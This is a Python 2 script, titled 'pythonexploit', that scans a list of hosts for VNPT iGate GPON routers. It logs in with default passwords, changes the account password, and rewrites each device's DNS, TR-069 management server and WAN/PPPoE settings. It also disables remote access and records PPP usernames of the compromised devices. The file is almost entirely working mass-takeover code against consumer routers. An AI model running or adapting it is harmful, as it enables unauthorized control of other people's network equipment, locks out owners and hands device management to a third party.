pythonexploit

1. import requests
2. import base64
3. import re
4. import sys
5. import urllib
6.  
7. # URL = ''
8. DEFAULT_PWD = "vnpt@security"
9.  
10. def get_cookies(uname, passwd):
11.     return {"Authorization" : "Basic " + base64.b64encode("{}:{}".format(uname, passwd)),}
12.  
13. def is_ip(string):
14.     return re.match("^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$", string) is not None
15.  
16. def is_url(string):
17.     return re.match("[http://|https://].+\..{2,4}", string) is not None
18.  
19. def log_error(err):
20.     f = open("/root/Desktop/igate_error_log.txt", "a")
21.     #f = open("igate_error_log.txt", "a")
22.     f.write("{}\n".format(err))
23.     f.close()
24.  
25. def log_success(url):
26.     f = open("/root/Desktop/igate_success_log.txt", "a")
27.     #f = open("igate_success_log.txt", "a")
28.     f.write("{}\n".format(url[7:]))
29.     f.close()
30.    
31. def do_config(url):
32.     global new_pass
33.     # credentials = [('operator', DEFAULT_PWD)]
34.     credentials = [('operator', ['operator', 'oper@tor', 'vnpt@security']), ('admin', ['admin', 'vnpt@security'])]
35.     # Loop change password
36.     success = False
37.     print "[+] Processing {}".format(url)
38.     for cred in credentials:
39.         try:
40.             uname, passwords = cred[0], cred[1]
41.             logged_in = False
42.             for passwd in passwords:
43.                 if logged_in:
44.                     break
45.                 cookies = get_cookies(uname, passwd)
46.                 cj = requests.cookies.RequestsCookieJar()
47.                 requests.utils.add_dict_to_cookiejar(cj, cookies)
48.                 with requests.Session() as c:
49.                     c.cookies = cj
50.                     res = c.get(url)
51.                     if "<!-- hide" in res.content:
52.                         logged_in = True
53.                         print "[i] Login successfully with {}".format(uname)
54.                         # Change password
55.                         c.get(url + "/password.cgi?inUserName={}&inPassword={}&inOrgPassword={}".format(uname, new_pass, passwd))
56.                         print "Change {} password successfully".format(uname)
57.                         if not success:
58.                             success = True
59.                             cj2 = requests.cookies.RequestsCookieJar()
60.                             cookies = get_cookies(uname, new_pass)
61.                             requests.utils.add_dict_to_cookiejar(cj2, cookies)
62.         except:
63.             pass
64.     if not success:
65.         print "[!] Can't login with default credentials"
66.         log_error("{}: Login failed".format(url[7:]))
67.         print "+-----------------+\n"
68.         return
69.     # Comment out this try catch block for debugging
70.     try:
71.         with requests.Session() as c:
72.             c.cookies = cj2
73.             # print requests.utils.dict_from_cookiejar(cj2)
74.             # Change DNS server
75.             dns_ifs = []
76.             dns_res = c.get(url + "/dnscfg.html").content
77.             v2 = False
78.             if dns_res == "":
79.                 dns_res = c.get(url + "/dnsconfg.html").content
80.                 v2 = True
81.             if dns_res != "":
82.                 dns_ifs += (c.split('/')[1] for c in re.findall("var\s*interfaceInfo\s*=\s*'(.+?)';", dns_res)[0].split('|'))      
83.                 c_dns = [ifs for ifs in dns_ifs if "ppp" in ifs]
84.                 if len(c_dns) != 0:
85.                     # print "Select DNS: {}".format(c_dns[0])
86.                     if not v2:
87.                         c.get(url + "/dnscfg.cgi?dnsIfcsList={}&dnsPrimary=0.0.0.0&dnsSecondary=0.0.0.0&dnsRefresh=0&dns6Type=Static".format(c_dns[0]))
88.                     else:
89.                         c.get(url + "/dnsconfg.cgi?dnsIfcsList={}&dnsPrimary=0.0.0.0&dnsSecondary=0.0.0.0&dnsRefresh=0&dns6Type=Static".format(c_dns[0]))
90.                     print "Change DNS successfully"
91.             else:
92.                 print "DNS configuration not found"
93.             # Change TR-069 server
94.             tr_069_res = c.get(url + "/tr69cfg.html").content
95.             v2 = False
96.             if tr_069_res == "":
97.                 v2 = True
98.                 tr_069_res = c.get(url + "/tr69confg.html").content
99.             if tr_069_res != "":
100.                 enblInform = re.findall("enblInform\s*=\s*'(\d{1})';", tr_069_res)[0]
101.                 informInterval = re.findall("informInterval\.value\s*=\s*'(\d+)';", tr_069_res)[0]
102.                 tr69cAcsUser = urllib.quote(re.findall("acsUser\.value\s*=\s*'(.*)';", tr_069_res)[0])
103.                 tr69cAcsPwd = urllib.quote(re.findall("acsPwd\.value\s*=\s*'(.*)';", tr_069_res)[0])
104.                 tr69cConnReqUser = urllib.quote(re.findall("connReqUser\.value\s*=\s*'(.*)';", tr_069_res)[0])
105.                 tr69cConnReqPwd = urllib.quote(re.findall("connReqPwd\.value\s*=\s*'(.*)';", tr_069_res)[0])
106.                 tr69cNoneConnReqAuth = re.findall("enblNoneConnReqAuth\s*=\s*'(\d{1})';", tr_069_res)[0]
107.                 tr69cDebugEnable = re.findall("enblDebug\s*=\s*'(\d{1})';", tr_069_res)[0]
108.                 tr69cBoundIfName = re.findall("var\s*boundIfName\s*=\s*'(.*)';", tr_069_res)[0]
109.                 if v2:
110.                     c.get(url + "/tr69confg.cgi?tr69cInformEnable={}&tr69cInformInterval={}&tr69cAcsURL=http://10.149.247.147:8091&tr69cAcsUser={}&tr69cAcsPwd={}&tr69cConnReqUser={}&tr69cConnReqPwd={}&tr69cNoneConnReqAuth={}&tr69cDebugEnable={}&tr69cBoundIfName={}".format(enblInform, informInterval, tr69cAcsUser, tr69cAcsPwd, tr69cConnReqUser, tr69cConnReqPwd, tr69cNoneConnReqAuth, tr69cDebugEnable, tr69cBoundIfName))
111.                 else:
112.                     c.get(url + "/tr69cfg.cgi?tr69cInformEnable={}&tr69cInformInterval={}&tr69cAcsURL=http://10.149.247.147:8091&tr69cAcsUser={}&tr69cAcsPwd={}&tr69cConnReqUser={}&tr69cConnReqPwd={}&tr69cNoneConnReqAuth={}&tr69cDebugEnable={}&tr69cBoundIfName={}".format(enblInform, informInterval, tr69cAcsUser, tr69cAcsPwd, tr69cConnReqUser, tr69cConnReqPwd, tr69cNoneConnReqAuth, tr69cDebugEnable, tr69cBoundIfName))
113.                 print "Successfully change TR-069 server to default"
114.             else:
115.                 print "TR-069 configuration not found"
116.             #return
117.             # Disable remote access via ssh and web for PPPoE interface
118.             ra_res = c.get(url + "/scinflt.cmd?action=remoteview").content
119.             ra_ifs = []
120.             ra_ifs += (c.split('/')[1] for c in re.findall("var\s*interfaceInfo\s*=\s*'(.+?)';", ra_res)[0].split('|'))
121.             ra_interface = [ifs for ifs in ra_ifs if "ppp" in ifs]
122.             if len(ra_interface) != 0:
123.                 c.get(url + "/scinflt.cmd?action=remoteset&wanIf={0}&ipver=4&protocol=1&accesshttp=0&fltNamehttp=HTTP_{0}&dstPorthttp=80&accessssh=0&fltNamessh=SSH_{0}&dstPortssh=22".format(ra_interface[0]))
124.             print "Successfully disable remote access on PPPoE interface"
125.             # Enable firewall
126.             fw_res = c.get(url + "/wancfg.cmd").content
127.             fw_ifs = re.findall("<td align='center'><input type='button' onClick='editClick\(\"(.+?)\", \"", fw_res)
128.             if len(fw_ifs) != 0:
129.                 i = [i for i in fw_ifs if "ppp" in i][0]
130.                 res = c.get(url + "/wanL3Edit.cmd?serviceId=1&wanIfName={}&ntwkPrtcl=12".format(i)).content
131.                 req1 = "/gponwan.cmd?action=add&ifname=veip0&wanIdx=2&connMode=1"
132.                 c.get(url + req1)
133.                 ppp_user = re.findall("pppUserName\.value\s*=\s*'(.+)';", res)[0]
134.                 ppp_password = re.findall("pppPassword\.value\s*=\s*'(.+)';", res)[0]
135.                 ppp_mtu = re.findall("pppMtuSize\.value\s*=\s*'(.+)';", res)[0]
136.                 req2 = "/tempstore.cgi?wanL2IfName=veip0&enblEnetWan=0&ntwkPrtcl=12&enblIpVer=0&serviceName=pppoe_veip0&pppUserName={}&pppPassword={}&pppMTU={}&ethMtu=1500".format(ppp_user, ppp_password, ppp_mtu)
137.                 c.get(url + req2)
138.                 enblNatppp = re.findall("var\s*natppp\s*=\s*'(\d{1})';", res)[0]
139.                 enblOnDemand = re.findall("var\s*onDemand\s*=\s*'(\d{1})';", res)[0]
140.                 enblFirewallppp = re.findall("var\s*firewallppp\s*=\s*'(\d{1})';", res)[0]
141.                 pppTimeOut = re.findall("var\s*timeOut\s*=\s*'(\d{1})';", res)[0]
142.                 enblIpAddr = re.findall("var\s*enblIpAddr\s*=\s*'(\d{1})';", res)[0]
143.                 cfgL2tpAc = re.findall("var\s*cfgL2tpAc\s*=\s*'(\d{1})';", res)[0]
144.                 localIpAddr = re.findall("var\s*localIpAddr\s*=\s*'(.+)';", res)[0]
145.                 ipExtension = re.findall("var\s*ipExtension\s*=\s*'(\d{1})';", res)[0]
146.                 enblFullconeNat = re.findall("var\s*fullconeNat\s*=\s*'(\d{1})';", res)[0]
147.                 enblFirewall = 1
148.                 authMethod = re.findall("var\s*authMethod\s*=\s*'(\d{1})';", res)[0]
149.                 pppAuthErrorRetry = re.findall("var\s*pppAuthErrorRetry\s*=\s*'(\d{1})';", res)[0]
150.                 enblPppDebug = re.findall("var\s*pppDebug\s*=\s*'(\d{1})';", res)[0]
151.                 enblIgmp = re.findall("var\s*enableIgmp\s*=\s*'(\d{1})';", res)[0]
152.                 enblGponWan = re.findall("var\s*enblGponWan\s*=\s*'(\d{1})';", res)[0]
153.                 noMcastVlanFlt = re.findall("var\s*noMcastVlanFlt\s*=\s*'(\d{1})';", res)[0]
154.                 if enblGponWan == '1':
155.                     if noMcastVlanFlt == '1':
156.                         noMcastVlanFilterNat = 1
157.                     else:
158.                         noMcastVlanFilterNat = 0
159.                
160.                 if enblIpAddr == '1' and cfgL2tpAc != '1':
161.                     useStaticIpAddress = 1
162.                     pppLocalIpAddress = localIpAddr
163.                 else:
164.                     useStaticIpAddress = 0
165.                     pppLocalIpAddress = localIpAddr
166.                 req3 = "/tempstore.cgi?serviceId=1&wanL2IfName=veip0&wanIdx=2&enblEnetWan=0&ntwkPrtcl=12&enVlanMux=1&vlanMuxId=11&vlanMuxPr=0&vlanTpid=33024&enblIpVer=0&serviceName=pppoe_veip0&pppUserName={0}&pppPassword={1}&pppMTU={2}&enblOnDemand={3}&pppTimeOut={4}&useStaticIpAddress={5}&pppLocalIpAddress={6}&pppIpExtension={7}&enblNat={8}&enblFullcone={9}&enblFirewall={10}&pppAuthMethod={11}&pppAuthErrorRetry={12}&enblPppDebug={13}&pppToBridge=0&enblIgmp={14}&noMcastVlanFilter={15}&defaultGatewayList={16}&dnsIfcsList={16}&dnsPrimary=0.0.0.0&dnsSecondary=0.0.0.0&dnsRefresh=0".format(ppp_user, ppp_password, ppp_mtu, enblOnDemand, pppTimeOut, useStaticIpAddress, pppLocalIpAddress, 0, enblNatppp, enblFullconeNat, enblFirewall, authMethod, pppAuthErrorRetry, enblPppDebug, enblIgmp, noMcastVlanFilterNat, i)
167.                 c.get(url + req3)
168.                 req4 = "/wancfg.cmd?action=add&ifname=veip0&wanIdx=2&connMode=1"
169.                 try:
170.                     c.get(url + req4, timeout = 3)
171.                 except:
172.                     pass
173.                 print "Successfully enable firewall"
174.             log_success("{}|{}".format(url, ppp_user))
175.             print "+-----------------+\n"
176.     except Exception as e:
177.         print "[!] Error: {}".format(str(e))
178.         log_error("{}: {}".format(ip, str(e)))
179.         print "+-----------------+\n"
180.  
181.    
182. if __name__ == "__main__":
183.     credentials = [('operator', 'operator'), ('operator', 'oper@tor'), ('admin', 'admin')]
184.     # credentials = [('operator', DEFAULT_PWD), ('operator', 'oper@tor'), ('admin', 'admin')]
185.     if len(sys.argv) == 1:
186.         print "[!] Please specific file that contain ip to config"
187.         sys.exit(1)
188.     ips = open(sys.argv[1])
189.     try:
190.         new_pass = raw_input("Input new password, press [Enter] if you want to use the default: ")
191.         if new_pass == "":
192.             new_pass = DEFAULT_PWD
193.         for ip in ips:
194.             ip = ip.strip('/').strip()
195.             if not is_ip(ip) and not is_url(ip):
196.                 print "[!] {} is not an valid IP address/url".format(ip)
197.                 continue
198.             else:
199.                 if is_url(ip):
200.                     url = ip
201.                 else:
202.                     url = 'http://' + ip.strip()
203.             print "Trying: {}".format(url)
204.             try:
205.                 res = requests.get(url, timeout=3).content
206.             except Exception as e:
207.                 print "[!] Error: {}".format(str(e))
208.                 print "[i] Skipping..."
209.                 print "+-----------------+\n"
210.                 log_error("{}: {}".format(ip, str(e)))
211.                 continue
212.             if "iGate" and "GPON ONT" in res:
213.                 do_config(url)
214.             else:
215.                 print "[!] {} is not using ONU GPON iGate, skipping...".format(url)
216.                 print "+-----------------+\n"
217.                 log_error("{}: Not GPON igate".format(ip))
218.     except KeyboardInterrupt:
219.         print "[i] Canceled by user, exitting..."
220.         sys.exit()